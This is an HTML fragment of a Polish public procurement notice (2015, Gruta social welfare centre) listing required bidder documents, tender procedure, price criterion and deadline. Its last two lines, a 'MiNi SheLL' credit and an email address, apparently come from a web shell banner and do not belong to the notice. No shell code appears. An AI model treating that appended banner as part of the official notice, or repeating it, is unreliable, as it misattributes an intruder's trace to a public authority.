<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk - Formularz oferty - załącznik nr 1 do SIWZ, Projekt umowy - załącznik nr 4 do SIWZ. Projekt umowy należy złożyć zaparafowany na każdej stronie przez osobę/y uprawnione. Zamawiający przyjmuje, że postanowienia projektu umowy są wiążące do chwili podpisania umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:www.bip.gruta.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno, od poniedziałku do piątku w godz. od 7.30 do 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2015 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com